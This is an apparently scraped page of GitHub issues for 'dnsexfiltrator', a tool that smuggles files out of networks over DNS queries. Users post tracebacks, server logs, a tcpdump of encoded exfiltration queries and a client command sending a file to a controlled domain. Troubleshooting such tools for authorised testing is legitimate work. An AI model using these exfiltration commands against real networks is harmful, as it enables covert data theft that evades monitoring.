arno0x / dnsexfiltrator Goto Github PK
View Code? Open in Web Editor NEWData exfiltration over DNS request covert channel
Data exfiltration over DNS request covert channel
I keep getting:
"Traceback (most recent call last):
File "./dnsexfiltrator.py", line 144, in
request = DNSRecord.parse(data)
File "/usr/lib/python2.7/dist-packages/dnslib/dns.py", line 104, in parse
questions.append(DNSQuestion.parse(buffer))
File "/usr/lib/python2.7/dist-packages/dnslib/dns.py", line 645, in parse
buffer.offset,e))
dnslib.dns.DNSError: Error unpacking DNSQuestion [offset=55]: Invalid label < lets>"
Any idea how to fix?
Hello, thank you for your fantastic work!
I found sometimes the server dies, and believed that it is because of recieving bogus DNS data such as:
[1] DNS requests which generated from others
[2] Duplicated DNS record
For example, I saw the following:
# ./dnsexfiltrator.py -d ****** -p ******
[*] DNS server listening on port 53
[+] Received query: [init.RE5TRXhmaWwudHh0fDU.******.net.] - Type: [16]
[+] Receiving file [DNSExfil.txt] as a ZIP file in [5] chunks
[+] Received query: [ns2.******.net.] - Type: [28]
[!] Stopping DNS Server
Traceback (most recent call last):
File "./dnsexfiltrator.py", line 156, in <module>
chunkNumber, rawData = msg.split('.',1)
ValueError: need more than 1 value to unpack
# ./dnsexfiltrator.py -d ****** -p ******
[*] DNS server listening on port 53
[+] Received query: [69.nyXdZj07A7zOWKcGeITueGkSvETv4CReY6tVOJLELarJlE4Lcs.******.net.] - Type: [16]
[!] Stopping DNS Server
Traceback (most recent call last):
File "./dnsexfiltrator.py", line 173, in <module>
if chunkIndex == nbChunks:
NameError: name 'nbChunks' is not defined
The tcpdump is here:
09:08:00.560297 IP 54.***.***.196.49148 > 172.***.***.88.53: 464% [1au] AAAA? ns1.******.net. (54)
09:08:00.560314 IP 54.***.***.196.18018 > 172.***.***.88.53: 33279% [1au] AAAA? ns2.******.net. (54)
09:08:00.563451 IP 52.***.***.101.22503 > 172.***.***.88.53: 39347% [1au] AAAA? ns1.******.net. (54)
09:08:00.563464 IP 52.***.***.101.16777 > 172.***.***.88.53: 23126% [1au] AAAA? ns2.******.net. (54)
09:08:00.563546 IP 52.***.***.101.13240 > 172.***.***.88.53: 27581% [1au] TXT? 0.S6GMbKdnhmKG72XDoUUIHNeWeHCAjxYZzICr9YNGDK55zXd-Q6gUwsoTpFBN8Bo.KtcPvGtNqHw3D8CA93Gubwldn2xYZ_IIRqib-qDBcL2uDB43ZBEvLfrQLb2Ll0e.2gsfvaPbZD6XrKVmgI8lfcHC-eAR1mFNSN62LiaF7KRjAE-L3Q6FmeoCu3a56Ji.FIZKR-KMGj1Zttm7NlepW5zURsfU3.******.net. (274)
09:08:00.571530 IP 54.***.***.207.19137 > 172.***.***.88.53: 43369% [1au] AAAA? ns2.******.net. (54)
09:08:00.577745 IP 13.***.***.85.59518 > 172.***.***.88.53: 54284% [1au] TXT? 0.S6GMbKdnhmKG72XDoUUIHNeWeHCAjxYZzICr9YNGDK55zXd-Q6gUwsoTpFBN8Bo.KtcPvGtNqHw3D8CA93Gubwldn2xYZ_IIRqib-qDBcL2uDB43ZBEvLfrQLb2Ll0e.2gsfvaPbZD6XrKVmgI8lfcHC-eAR1mFNSN62LiaF7KRjAE-L3Q6FmeoCu3a56Ji.FIZKR-KMGj1Zttm7NlepW5zURsfU3.******.net. (274)
09:08:00.717056 IP 13.***.***.172.49485 > 172.***.***.88.53: 28854% AAAA? ns2.******.net. (43)
09:08:00.717087 IP 13.***.***.172.64431 > 172.***.***.88.53: 12666% AAAA? ns1.******.net. (43)
^C
In the case, the DNS records start with "ns1" and "ns2" seem to trigger the error.
So I added the following:
136 if qname.startswith("ns"):
137 continue
138
But it should not enough ...
The choice between RC4 and AES is not just a matter of taste. RC4 has serious vulnerabilities and is deprecated by RFC 7465, published three years ago. https://www.rfc-editor.org/rfc/rfc7465.txt
Hi, I am really appreciate that you create such tools so that I could test DNS security.
I have downloaded this file and have kind of issue.
I also have seen of same issue in this github page.
However, I really don't know how to solve this.
Here is my environment:
My question is this:
Did I configure something wrong?
Do I have to own a Name server of NS record? (because I don't own the name server but AWS own it)
Thank you for your effort,
Best regards.
It would be great to have an option to use/support different versions of .NET, even at the cost of not compressing files
Hello,
First of all, many thanks for your efforts and help.
I'm keeping getting this message "DNS name doesn't exist" however my DNS and Google DNS can resolve mydomain.com with no issues and NS record is pointing to my kali machine.
Is there anything missing, please? by the way I'm using win10 as the source and the kali with python 2.7 as a target.
hello,
the data transferred unable to unzip or corrupted? using Invoke-DNSExfiltrator.ps1
unzip test.txt.zip
Archive: test.txt.zip
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of test.txt.zip or
test.txt.zip.zip, and cannot find test.txt.zip.ZIP, period.
file test.txt.zip
test.txt.zip: data
the file is not a zip file. how can i see the data exfiltrated? or transferred? thanks
i am using the power shell ,
i have an EC2 virtual machine on amazone which is running Kali Linux and i am doing the same steps having the same domain specified in the server and the client
Server : .\dnsexfiltrator.py -d mydomain.com -p password
Client : ./DNSExfiltrator.exe c:\users\root\Desktop\DNSExfiltrator-master\test1.png mydomain.com password s=ip of my ec2 machine t=1000
i also tried to put the domain name of the ec2 machine but it didnt recognize it.
your help will be highly apprecaited as i have an exfiltration at a customer site and i need to use this tool
Best Regards
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.